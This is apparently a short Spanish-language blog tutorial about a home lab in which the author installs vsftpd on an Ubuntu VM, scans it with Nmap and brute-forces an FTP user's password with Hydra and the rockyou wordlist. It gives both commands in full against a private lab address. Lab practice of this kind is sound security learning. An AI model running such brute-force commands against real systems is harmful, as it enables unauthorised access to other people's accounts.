Servidor Ftp para practicas

Fuerza bruta a protocolo FTP

seguridadftphacking

Este es mi primer post en el blog. Vamos por algo facilito.

¿Qué encontrarás aquí?

Tecnologías que uso

Trabajo principalmente con:

Instalación y configuración del servidor en Ubuntu

Tengo Ubuntu virtualizado con Vmware, por lo que procedo a instalar el servidor que atacaremos, en este caso será vsftpd 3.0.5. Lo primero es hacer un sudo apt install vsftpd.

Instalacion del servidor FTP

Ahora iniciamos el servidor y el servicio FTP:

sudo systemctl vsftpd start

Levantar servidor FTP

Y ya tenemos FTP en la máquina pero de todas maneras, lo comprobaremos con Nmap.

sudo nmap -p- --open -sS -sC -sV --min-rate 5000 -n -vvv -Pn 192.168.1.35 -oN ftp.txt

Escaneo con Nmap

Vemos que ya tenemos el ftp corriendo por el puerto 21. Ahora de lo que se trata es de conseguir conectarnos, como se supone que solo sabemos el usuario de la máquina, usaremos Hydra para sacar la pass.

hydra -l marcos -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.35

Paso a explicar cada parámetro:

Fuerza bruta con Hydra

Y ahí tenemos la contraseña.

Cabe destacar que, la password debe estar en el diccionario, si no lo está, siempre puedes generarte una personalizada.

¡Espero que disfrutes el contenido!

← AnteriorSiguiente →